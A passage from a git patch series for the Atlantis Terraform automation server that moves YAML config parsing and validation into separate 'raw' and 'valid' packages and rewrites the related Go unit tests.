-	type alias Workflow
-	var tmp alias
-	if err := unmarshal(&tmp); err != nil {
-		return err
-	}
-	*p = Workflow(tmp)
-
-	// If plan or apply keys aren't specified we use the default workflow.
-	if p.Apply == nil {
-		p.Apply = &Stage{
-			[]StepConfig{
-				{
-					StepType: "apply",
-				},
-			},
-		}
-	}
-
-	if p.Plan == nil {
-		p.Plan = &Stage{
-			[]StepConfig{
-				{
-					StepType: "init",
-				},
-				{
-					StepType: "plan",
-				},
-			},
-		}
-	}
-
-	return nil
+	Apply *Stage `yaml:"apply,omitempty"`
+	Plan  *Stage `yaml:"plan,omitempty"`
 }
diff --git a/server/events/yaml/workflow_test.go b/server/events/yaml/workflow_test.go
index dd299799e4..c2dcbb34f8 100644
--- a/server/events/yaml/workflow_test.go
+++ b/server/events/yaml/workflow_test.go
@@ -16,102 +16,70 @@ func TestWorkflow_UnmarshalYAML(t *testing.T) {
 		expErr      string
 	}{
 		{
-			description: "should use defaults if set to null",
+			description: "empty",
+			input:       ``,
+			exp: yaml.Workflow{
+				Apply: nil,
+				Plan:  nil,
+			},
+		},
+		{
+			description: "yaml null",
 			input:       `~`,
 			exp: yaml.Workflow{
-				Apply: &yaml.Stage{
-					Steps: []yaml.StepConfig{
-						{
-							StepType: "apply",
-						},
-					},
-				},
-				Plan: &yaml.Stage{
-					Steps: []yaml.StepConfig{
-						{
-							StepType: "init",
-						},
-						{
-							StepType: "plan",
-						},
-					},
-				},
+				Apply: nil,
+				Plan:  nil,
 			},
 		},
 		{
-			description: "should use set values",
+			description: "only plan/apply set",
 			input: `
 plan:
-  steps:
-  - plan
 apply:
-  steps: []
 `,
 			exp: yaml.Workflow{
-				Apply: &yaml.Stage{
-					Steps: []yaml.StepConfig{},
-				},
-				Plan: &yaml.Stage{
-					Steps: []yaml.StepConfig{
-						{
-							StepType: "plan",
-						},
-					},
-				},
+				Apply: nil,
+				Plan:  nil,
 			},
 		},
 		{
-			description: "should use defaults for apply if only plan set",
+			description: "steps set to null",
 			input: `
 plan:
-  steps: []`,
+  steps: ~
+apply:
+  steps: ~`,
 			exp: yaml.Workflow{
-				Apply: &yaml.Stage{
-					Steps: []yaml.StepConfig{
-						{
-							StepType: "apply",
-						},
-					},
-				},
 				Plan: &yaml.Stage{
-					Steps: []yaml.StepConfig{},
+					Steps: nil,
+				},
+				Apply: &yaml.Stage{
+					Steps: nil,
 				},
 			},
 		},
 		{
-			description: "should use defaults for plan if only apply set",
+			description: "steps set to empty slice",
 			input: `
+plan:
+  steps: []
 apply:
   steps: []`,
 			exp: yaml.Workflow{
-				Apply: &yaml.Stage{
-					Steps: []yaml.StepConfig{},
-				},
 				Plan: &yaml.Stage{
-					Steps: []yaml.StepConfig{
-						{
-							StepType: "init",
-						},
-						{
-							StepType: "plan",
-						},
-					},
+					Steps: []yaml.Step{},
+				},
+				Apply: &yaml.Stage{
+					Steps: []yaml.Step{},
 				},
 			},
 		},
-		{
-			description: "should error if no steps key specified",
-			input: `
-apply:
-- apply`,
-			expErr: "missing \"steps\" key",
-		},
 	}
 
 	for _, c := range cases {
 		t.Run(c.description, func(t *testing.T) {
 			var w yaml.Workflow
-			err := yamlv2.Unmarshal([]byte(c.input), &w)
+			err := yamlv2.UnmarshalStrict([]byte(c.input), &w)
 			if c.expErr != "" {
 				ErrEquals(t, c.expErr, err)
 				return
diff --git a/server/events/yaml/yaml_test.go b/server/events/yaml/yaml_test.go
new file mode 100644
index 0000000000..c82dd3486b
--- /dev/null
+++ b/server/events/yaml/yaml_test.go
@@ -0,0 +1,13 @@
+package yaml_test
+
+// Bool is a helper routine that allocates a new bool value
+// to store v and returns a pointer to it.
+func Bool(v bool) *bool { return &v }
+
+// Int is a helper routine that allocates a new int value
+// to store v and returns a pointer to it.
+func Int(v int) *int { return &v }
+
+// String is a helper routine that allocates a new string value
+// to store v and returns a pointer to it.
+func String(v string) *string { return &v }
diff --git a/testing/assertions.go b/testing/assertions.go
index 5b6ad147bd..d66266824e 100644
--- a/testing/assertions.go
+++ b/testing/assertions.go
@@ -20,6 +20,7 @@ import (
 	"strings"
 	"testing"
 
+	"github.com/davecgh/go-spew/spew"
 	"github.com/go-test/deep"
 )
 
@@ -49,8 +50,7 @@ func Equals(tb testing.TB, exp, act interface{}) {
 	tb.Helper()
 	if diff := deep.Equal(exp, act); diff != nil {
 		_, file, line, _ := runtime.Caller(1)
-		fmt.Printf("\033[31m%s:%d:\n\n\texp: %#v\n\n\tgot: %#v\033[39m\n\n", filepath.Base(file), line, exp, act)
-		tb.Fatal(diff)
+		tb.Fatalf("\033[31m%s:%d: %s\n\nexp: %s******\ngot: %s\033[39m\n", filepath.Base(file), line, diff, spew.Sdump(exp), spew.Sdump(act))
 	}
 }
 
@@ -58,10 +58,10 @@ func Equals(tb testing.TB, exp, act interface{}) {
 func ErrEquals(tb testing.TB, exp string, act error) {
 	tb.Helper()
 	if act == nil {
-		tb.Fatalf("exp err %q but err was nil", exp)
+		tb.Fatalf("exp err %q but err was nil\n", exp)
 	}
 	if act.Error() != exp {
-		tb.Fatalf("exp err: %q but got: %q", exp, act.Error())
+		tb.Fatalf("exp err: %q but got: %q\n", exp, act.Error())
 	}
 }
 

From d70e57e87bb876f49b16ea45107e51891e52782f Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Wed, 13 Jun 2018 13:54:04 +0100
Subject: [PATCH 20/69] Yaml parsing and validation.

---
 server/events/execution_planner.go            |   16 +-
 server/events/markdown_renderer.go            |    2 +-
 server/events/yaml/auto_plan.go               |    6 -
 server/events/yaml/auto_plan_test.go          |   69 --
 server/events/yaml/parser_validator.go        |   61 +-
 server/events/yaml/parser_validator_test.go   | 1049 +++++++++--------
 server/events/yaml/project.go                 |   10 -
 server/events/yaml/project_test.go            |   63 -
 server/events/yaml/raw/autoplan.go            |   39 +
 server/events/yaml/raw/autoplan_test.go       |  151 +++
 server/events/yaml/raw/project.go             |   70 ++
 server/events/yaml/raw/project_test.go        |  178 +++
 server/events/yaml/raw/raw.go                 |    4 +
 .../yaml/{yaml_test.go => raw/raw_test.go}    |    2 +-
 server/events/yaml/raw/spec.go                |   45 +
 server/events/yaml/raw/spec_test.go           |  268 +++++
 server/events/yaml/raw/stage.go               |   26 +
 server/events/yaml/raw/stage_test.go          |  103 ++
 server/events/yaml/raw/step.go                |  195 +++
 server/events/yaml/raw/step_test.go           |  387 ++++++
 server/events/yaml/raw/workflow.go            |   31 +
 server/events/yaml/raw/workflow_test.go       |  168 +++
 server/events/yaml/spec.go                    |    7 -
 server/events/yaml/spec_test.go               |  152 ---
 server/events/yaml/stage.go                   |    5 -
 server/events/yaml/stage_test.go              |   47 -
 server/events/yaml/step.go                    |   61 -
 server/events/yaml/step_test.go               |  134 ---
 server/events/yaml/valid/valid.go             |   41 +
 server/events/yaml/workflow.go                |    6 -
 server/events/yaml/workflow_test.go           |   91 --
 server/events/yaml/yaml.go                    |    4 -
 32 files changed, 2306 insertions(+), 1185 deletions(-)
 delete mode 100644 server/events/yaml/auto_plan.go
 delete mode 100644 server/events/yaml/auto_plan_test.go
 delete mode 100644 server/events/yaml/project.go
 delete mode 100644 server/events/yaml/project_test.go
 create mode 100644 server/events/yaml/raw/autoplan.go
 create mode 100644 server/events/yaml/raw/autoplan_test.go
 create mode 100644 server/events/yaml/raw/project.go
 create mode 100644 server/events/yaml/raw/project_test.go
 create mode 100644 server/events/yaml/raw/raw.go
 rename server/events/yaml/{yaml_test.go => raw/raw_test.go} (95%)
 create mode 100644 server/events/yaml/raw/spec.go
 create mode 100644 server/events/yaml/raw/spec_test.go
 create mode 100644 server/events/yaml/raw/stage.go
 create mode 100644 server/events/yaml/raw/stage_test.go
 create mode 100644 server/events/yaml/raw/step.go
 create mode 100644 server/events/yaml/raw/step_test.go
 create mode 100644 server/events/yaml/raw/workflow.go
 create mode 100644 server/events/yaml/raw/workflow_test.go
 delete mode 100644 server/events/yaml/spec.go
 delete mode 100644 server/events/yaml/spec_test.go
 delete mode 100644 server/events/yaml/stage.go
 delete mode 100644 server/events/yaml/stage_test.go
 delete mode 100644 server/events/yaml/step.go
 delete mode 100644 server/events/yaml/step_test.go
 create mode 100644 server/events/yaml/valid/valid.go
 delete mode 100644 server/events/yaml/workflow.go
 delete mode 100644 server/events/yaml/workflow_test.go
 delete mode 100644 server/events/yaml/yaml.go

diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go
index 415ed2da18..4b13ce2190 100644
--- a/server/events/execution_planner.go
+++ b/server/events/execution_planner.go
@@ -9,6 +9,7 @@ import (
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/yaml"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	"github.com/runatlantis/atlantis/server/logging"
 )
 
@@ -75,7 +76,7 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu
 	// Else we run plan according to the config file.
 	var stages []runtime.PlanStage
 	for _, p := range config.Projects {
-		if s.shouldAutoplan(p.AutoPlan, modifiedFiles) {
+		if s.shouldAutoplan(p.Autoplan, modifiedFiles) {
 			// todo
 			stages = append(stages)
 		}
@@ -83,7 +84,7 @@ func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFu
 	return stages, nil
 }
 
-func (s *ExecutionPlanner) shouldAutoplan(autoplan yaml.AutoPlan, modifiedFiles []string) bool {
+func (s *ExecutionPlanner) shouldAutoplan(autoplan valid.Autoplan, modifiedFiles []string) bool {
 	return true
 }
 
@@ -118,15 +119,16 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 	// Get this project's configuration.
 	for _, p := range config.Projects {
 		if p.Dir == relProjectPath && p.Workspace == workspace {
-			workflowName := p.Workflow
+			workflowNamePtr := p.Workflow
 
 			// If they didn't specify a workflow, use the default.
-			if workflowName == "" {
+			if workflowNamePtr == nil {
 				log.Info("no %s workflow set––continuing with defaults", AtlantisYAMLFilename)
 				return defaults, nil
 			}
 
 			// If they did specify a workflow, find it.
+			workflowName := *workflowNamePtr
 			workflow, exists := config.Workflows[workflowName]
 			if !exists {
 				return nil, fmt.Errorf("no workflow with key %q defined", workflowName)
@@ -135,7 +137,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 			// We have a workflow defined, so now we need to build it.
 			meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
 			var steps []runtime.Step
-			var stepsConfig []yaml.Step
+			var stepsConfig []valid.Step
 			if stageName == PlanStageName {
 				stepsConfig = workflow.Plan.Steps
 			} else {
@@ -143,7 +145,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 			}
 			for _, stepConfig := range stepsConfig {
 				var step runtime.Step
-				switch stepConfig.Key {
+				switch stepConfig.StepName {
 				case "init":
 					step = &runtime.InitStep{
 						Meta:      meta,
@@ -162,7 +164,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 				case "run":
 					step = &runtime.RunStep{
 						Meta:     meta,
-						Commands: stepConfig.StringVal,
+						Commands: stepConfig.RunCommand,
 					}
 				}
 				steps = append(steps, step)
diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go
index f91a45a1f1..4094c3861c 100644
--- a/server/events/markdown_renderer.go
+++ b/server/events/markdown_renderer.go
@@ -125,7 +125,7 @@ var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index
 var multiProjectTmpl = template.Must(template.New("").Funcs(sprig.TxtFuncMap()).Parse(
 	"Ran {{.Command}} for {{ len .Results }} projects:\n" +
 		"{{ range $result := .Results }}" +
-		"1. path: `{{$result.Dir}} workspace: `{{$result.Workspace}}`\n" +
+		"1. workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" +
 		"{{end}}\n" +
 		"{{ range $i, $result := .Results }}" +
 		"### {{add $i 1}}. workspace: `{{$result.Workspace}}` path: `{{$result.Dir}}`\n" +
diff --git a/server/events/yaml/auto_plan.go b/server/events/yaml/auto_plan.go
deleted file mode 100644
index 00eb0cc79d..0000000000
--- a/server/events/yaml/auto_plan.go
+++ /dev/null
@@ -1,6 +0,0 @@
-package yaml
-
-type AutoPlan struct {
-	WhenModified []string `yaml:"when_modified,omitempty"`
-	Enabled      *bool    `yaml:"enabled,omitempty"`
-}
diff --git a/server/events/yaml/auto_plan_test.go b/server/events/yaml/auto_plan_test.go
deleted file mode 100644
index 04d517d94f..0000000000
--- a/server/events/yaml/auto_plan_test.go
+++ /dev/null
@@ -1,69 +0,0 @@
-package yaml_test
-
-import (
-	"testing"
-
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	. "github.com/runatlantis/atlantis/testing"
-	yamlv2 "gopkg.in/yaml.v2"
-)
-
-func TestAutoPlan_UnmarshalYAML(t *testing.T) {
-	cases := []struct {
-		description string
-		input       string
-		exp         yaml.AutoPlan
-	}{
-		{
-			description: "omit unset fields",
-			input:       "",
-			exp: yaml.AutoPlan{
-				Enabled:      nil,
-				WhenModified: nil,
-			},
-		},
-		{
-			description: "all fields set",
-			input: `
-enabled: true
-when_modified: ["something-else"]
-`,
-			exp: yaml.AutoPlan{
-				Enabled:      Bool(true),
-				WhenModified: []string{"something-else"},
-			},
-		},
-		{
-			description: "enabled false",
-			input: `
-enabled: false
-when_modified: ["something-else"]
-`,
-			exp: yaml.AutoPlan{
-				Enabled:      Bool(false),
-				WhenModified: []string{"something-else"},
-			},
-		},
-		{
-			description: "modified elem empty",
-			input: `
-enabled: false
-when_modified:
--
-`,
-			exp: yaml.AutoPlan{
-				Enabled:      Bool(false),
-				WhenModified: []string{""},
-			},
-		},
-	}
-
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			var a yaml.AutoPlan
-			err := yamlv2.UnmarshalStrict([]byte(c.input), &a)
-			Ok(t, err)
-			Equals(t, c.exp, a)
-		})
-	}
-}
diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go
index f824737404..8dc895d132 100644
--- a/server/events/yaml/parser_validator.go
+++ b/server/events/yaml/parser_validator.go
@@ -1,11 +1,15 @@
 package yaml
 
 import (
+	"fmt"
 	"io/ioutil"
 	"os"
 	"path/filepath"
 
+	"github.com/go-ozzo/ozzo-validation"
 	"github.com/pkg/errors"
+	"github.com/runatlantis/atlantis/server/events/yaml/raw"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	"gopkg.in/yaml.v2"
 )
 
@@ -17,50 +21,57 @@ type ParserValidator struct{}
 // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir.
 // If there was no config file, then this can be detected by checking the type
 // of error: os.IsNotExist(error).
-func (r *ParserValidator) ReadConfig(repoDir string) (Spec, error) {
+func (r *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) {
 	configFile := filepath.Join(repoDir, AtlantisYAMLFilename)
 	configData, err := ioutil.ReadFile(configFile)
 
 	// NOTE: the error we return here must also be os.IsNotExist since that's
 	// what our callers use to detect a missing config file.
 	if err != nil && os.IsNotExist(err) {
-		return Spec{}, err
+		return valid.Spec{}, err
 	}
 
 	// If it exists but we couldn't read it return an error.
 	if err != nil {
-		return Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
+		return valid.Spec{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
 	}
 
 	// If the config file exists, parse it.
 	config, err := r.parseAndValidate(configData)
 	if err != nil {
-		return Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
+		return valid.Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
 	}
 	return config, err
 }
 
-func (r *ParserValidator) parseAndValidate(configData []byte) (Spec, error) {
-	var repoConfig Spec
-	if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil {
-		return repoConfig, err
+func (r *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) {
+	var rawSpec raw.Spec
+	if err := yaml.UnmarshalStrict(configData, &rawSpec); err != nil {
+		return valid.Spec{}, err
 	}
 
-	// Validate version.
-	//if repoConfig.Version != 2 {
-	//	// todo: this will fail old atlantis.yaml files, we should deal with them in a better way.
-	//	return repoConfig, errors.New("unknown version: must have \"version: 2\" set")
-	//}
-	//
-	//// Validate projects.
-	//if len(repoConfig.Projects) == 0 {
-	//	return repoConfig, errors.New("'projects' key must exist and contain at least one element")
-	//}
-	//
-	//for i, project := range repoConfig.Projects {
-	//	if project.Dir == "" {
-	//		return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i)
-	//	}
-	//}
-	return repoConfig, nil
+	// Set ErrorTag to yaml so it uses the YAML field names in error messages.
+	validation.ErrorTag = "yaml"
+
+	if err := rawSpec.Validate(); err != nil {
+		return valid.Spec{}, err
+	}
+
+	// Top level validation.
+	for _, p := range rawSpec.Projects {
+		if p.Workflow != nil {
+			workflow := *p.Workflow
+			found := false
+			for k := range rawSpec.Workflows {
+				if k == workflow {
+					found = true
+				}
+			}
+			if !found {
+				return valid.Spec{}, fmt.Errorf("workflow %q is not defined", workflow)
+			}
+		}
+	}
+
+	return rawSpec.ToValid(), nil
 }
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
index 3081970892..51fa1ca702 100644
--- a/server/events/yaml/parser_validator_test.go
+++ b/server/events/yaml/parser_validator_test.go
@@ -1,498 +1,555 @@
 package yaml_test
 
-//func TestReadConfig_DirDoesNotExist(t *testing.T) {
-//	r := yaml.ParserValidator{}
-//	_, err := r.ReadConfig("/not/exist")
-//	Assert(t, os.IsNotExist(err), "exp nil ptr")
-//}
-//
-//func TestReadConfig_FileDoesNotExist(t *testing.T) {
-//	tmpDir, cleanup := TempDir(t)
-//	defer cleanup()
-//
-//	r := yaml.ParserValidator{}
-//	_, err := r.ReadConfig(tmpDir)
-//	Assert(t, os.IsNotExist(err), "exp nil ptr")
-//}
-//
-//func TestReadConfig_BadPermissions(t *testing.T) {
-//	tmpDir, cleanup := TempDir(t)
-//	defer cleanup()
-//	err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000)
-//	Ok(t, err)
-//
-//	r := yaml.ParserValidator{}
-//	_, err = r.ReadConfig(tmpDir)
-//	ErrContains(t, "unable to read atlantis.yaml file: ", err)
-//}
-//
-//func TestReadConfig_UnmarshalErrors(t *testing.T) {
-//	// We only have a few cases here because we assume the YAML library to be
-//	// well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810.
-//	cases := []struct {
-//		description string
-//		input       string
-//		expErr      string
-//	}{
-//		{
-//			"random characters",
-//			"slkjds",
-//			"parsing atlantis.yaml: yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `slkjds` into yaml.Spec",
-//		},
-//		{
-//			"just a colon",
-//			":",
-//			"parsing atlantis.yaml: yaml: did not find expected key",
-//		},
-//	}
-//
-//	tmpDir, cleanup := TempDir(t)
-//	defer cleanup()
-//
-//	for _, c := range cases {
-//		t.Run(c.description, func(t *testing.T) {
-//			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
-//			Ok(t, err)
-//			r := yaml.ParserValidator{}
-//			_, err = r.ReadConfig(tmpDir)
-//			ErrEquals(t, c.expErr, err)
-//		})
-//	}
-//}
-//
-//func TestReadConfig_Invalid(t *testing.T) {
-//	cases := []struct {
-//		description string
-//		input       string
-//		expErr      string
-//	}{
-//		// Invalid version.
-//		{
-//			description: "no version",
-//			input: `
-//projects:
-//- dir: "."
-//`,
-//			expErr: "unknown version: must have \"version: 2\" set",
-//		},
-//		{
-//			description: "unsupported version",
-//			input: `
-//version: 0
-//projects:
-//- dir: "."
-//`,
-//			expErr: "unknown version: must have \"version: 2\" set",
-//		},
-//		{
-//			description: "empty version",
-//			input: `
-//version: ~
-//projects:
-//- dir: "."
-//`,
-//			expErr: "unknown version: must have \"version: 2\" set",
-//		},
-//
-//		// No projects specified.
-//		{
-//			description: "no projects key",
-//			input:       `version: 2`,
-//			expErr:      "'projects' key must exist and contain at least one element",
-//		},
-//		{
-//			description: "empty projects list",
-//			input: `
-//version: 2
-//projects:`,
-//			expErr: "'projects' key must exist and contain at least one element",
-//		},
-//
-//		// Project must have dir set.
-//		{
-//			description: "project with no config",
-//			input: `
-//version: 2
-//projects:
-//-`,
-//			expErr: "project at index 0 invalid: dir key must be set and non-empty",
-//		},
-//		{
-//			description: "project without dir set",
-//			input: `
-//version: 2
-//projects:
-//- workspace: "staging"`,
-//			expErr: "project at index 0 invalid: dir key must be set and non-empty",
-//		},
-//		{
-//			description: "project with dir set to empty string",
-//			input: `
-//version: 2
-//projects:
-//- dir: ""`,
-//			expErr: "project at index 0 invalid: dir key must be set and non-empty",
-//		},
-//		{
-//			description: "project with no config at index 1",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//-`,
-//			expErr: "project at index 1 invalid: dir key must be set and non-empty",
-//		},
-//		{
-//			description: "project with unknown key",
-//			input: `
-//version: 2
-//projects:
-//- unknown: value`,
-//			expErr: "yaml: unmarshal errors:\n  line 4: field unknown not found in struct yaml.alias",
-//		},
-//	}
-//
-//	tmpDir, cleanup := TempDir(t)
-//	defer cleanup()
-//
-//	for _, c := range cases {
-//		t.Run(c.description, func(t *testing.T) {
-//			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
-//			Ok(t, err)
-//
-//			r := yaml.ParserValidator{}
-//			_, err = r.ReadConfig(tmpDir)
-//			ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err)
-//		})
-//	}
-//}
-//
-//func TestReadConfig_Successes(t *testing.T) {
-//	basicProjects := []yaml.Project{
-//		{
-//			AutoPlan: &yaml.AutoPlan{
-//				Enabled:      true,
-//				WhenModified: []string{"**/*.tf"},
-//			},
-//			Workspace:         "default",
-//			TerraformVersion:  "",
-//			ApplyRequirements: nil,
-//			Workflow:          "",
-//			Dir:               ".",
-//		},
-//	}
-//
-//	cases := []struct {
-//		description string
-//		input       string
-//		expOutput   yaml.Spec
-//	}{
-//		{
-//			description: "uses project defaults",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//			},
-//		},
-//		{
-//			description: "autoplan is enabled by default",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//  auto_plan:
-//    when_modified: ["**/*.tf"]
-//`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//			},
-//		},
-//		{
-//			description: "if workflows not defined, there are none",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//			},
-//		},
-//		{
-//			description: "if workflows key set but with no workflows there are none",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//workflows: ~
-//`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//			},
-//		},
-//		{
-//			description: "if a workflow is defined but set to null we use the defaults",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//workflows:
-//  default: ~
-//`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//				Workflows: map[string]yaml.Workflow{
-//					"default": {
-//						Plan: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType: "init",
-//								},
-//								{
-//									StepType: "plan",
-//								},
-//							},
-//						},
-//						Apply: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType: "apply",
-//								},
-//							},
-//						},
-//					},
-//				},
-//			},
-//		},
-//		{
-//			description: "if a plan or apply has no steps defined then we use the defaults",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//workflows:
-//  default:
-//    plan:
-//    apply:
-//`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//				Workflows: map[string]yaml.Workflow{
-//					"default": {
-//						Plan: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType: "init",
-//								},
-//								{
-//									StepType: "plan",
-//								},
-//							},
-//						},
-//						Apply: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType: "apply",
-//								},
-//							},
-//						},
-//					},
-//				},
-//			},
-//		},
-//		{
-//			description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//workflows:
-//  default:
-//    plan:
-//      steps:
-//    apply:
-//      steps:
-//`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//				Workflows: map[string]yaml.Workflow{
-//					"default": {
-//						Plan: &yaml.Stage{
-//							Steps: nil,
-//						},
-//						Apply: &yaml.Stage{
-//							Steps: nil,
-//						},
-//					},
-//				},
-//			},
-//		},
-//		{
-//			description: "if steps are set then we parse them properly",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//workflows:
-//  default:
-//    plan:
-//      steps:
-//      - init
-//      - plan
-//    apply:
-//      steps:
-//      - plan # we don't validate if they make sense
-//      - apply
-//`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//				Workflows: map[string]yaml.Workflow{
-//					"default": {
-//						Plan: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType: "init",
-//								},
-//								{
-//									StepType: "plan",
-//								},
-//							},
-//						},
-//						Apply: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType: "plan",
-//								},
-//								{
-//									StepType: "apply",
-//								},
-//							},
-//						},
-//					},
-//				},
-//			},
-//		},
-//		{
-//			description: "we parse extra_args for the steps",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//workflows:
-//  default:
-//    plan:
-//      steps:
-//      - init:
-//          extra_args: []
-//      - plan:
-//          extra_args:
-//          - arg1
-//          - arg2
-//    apply:
-//      steps:
-//      - plan:
-//          extra_args: [a, b]
-//      - apply:
-//          extra_args: ["a", "b"]
-//`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//				Workflows: map[string]yaml.Workflow{
-//					"default": {
-//						Plan: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType:  "init",
-//									ExtraArgs: []string{},
-//								},
-//								{
-//									StepType:  "plan",
-//									ExtraArgs: []string{"arg1", "arg2"},
-//								},
-//							},
-//						},
-//						Apply: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType:  "plan",
-//									ExtraArgs: []string{"a", "b"},
-//								},
-//								{
-//									StepType:  "apply",
-//									ExtraArgs: []string{"a", "b"},
-//								},
-//							},
-//						},
-//					},
-//				},
-//			},
-//		},
-//		{
-//			description: "custom steps are parsed",
-//			input: `
-//version: 2
-//projects:
-//- dir: "."
-//workflows:
-//  default:
-//    plan:
-//      steps:
-//      - run: "echo \"plan hi\""
-//    apply:
-//      steps:
-//      - run: echo apply "arg 2"
-//`,
-//			expOutput: yaml.Spec{
-//				Version:  2,
-//				Projects: basicProjects,
-//				Workflows: map[string]yaml.Workflow{
-//					"default": {
-//						Plan: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType: "run",
-//									Run:      []string{"echo", "plan hi"},
-//								},
-//							},
-//						},
-//						Apply: &yaml.Stage{
-//							Steps: []yaml.Step{
-//								{
-//									StepType: "run",
-//									Run:      []string{"echo", "apply", "arg 2"},
-//								},
-//							},
-//						},
-//					},
-//				},
-//			},
-//		},
-//	}
-//
-//	tmpDir, cleanup := TempDir(t)
-//	defer cleanup()
-//
-//	for _, c := range cases {
-//		t.Run(c.description, func(t *testing.T) {
-//			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
-//			Ok(t, err)
-//
-//			r := yaml.ParserValidator{}
-//			act, err := r.ReadConfig(tmpDir)
-//			Ok(t, err)
-//			Equals(t, c.expOutput, act)
-//		})
-//	}
-//}
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestReadConfig_DirDoesNotExist(t *testing.T) {
+	r := yaml.ParserValidator{}
+	_, err := r.ReadConfig("/not/exist")
+	Assert(t, os.IsNotExist(err), "exp nil ptr")
+}
+
+func TestReadConfig_FileDoesNotExist(t *testing.T) {
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+
+	r := yaml.ParserValidator{}
+	_, err := r.ReadConfig(tmpDir)
+	Assert(t, os.IsNotExist(err), "exp nil ptr")
+}
+
+func TestReadConfig_BadPermissions(t *testing.T) {
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+	err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000)
+	Ok(t, err)
+
+	r := yaml.ParserValidator{}
+	_, err = r.ReadConfig(tmpDir)
+	ErrContains(t, "unable to read atlantis.yaml file: ", err)
+}
+
+func TestReadConfig_UnmarshalErrors(t *testing.T) {
+	// We only have a few cases here because we assume the YAML library to be
+	// well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810.
+	cases := []struct {
+		description string
+		input       string
+		expErr      string
+	}{
+		{
+			"random characters",
+			"slkjds",
+			"parsing atlantis.yaml: yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `slkjds` into raw.Spec",
+		},
+		{
+			"just a colon",
+			":",
+			"parsing atlantis.yaml: yaml: did not find expected key",
+		},
+	}
+
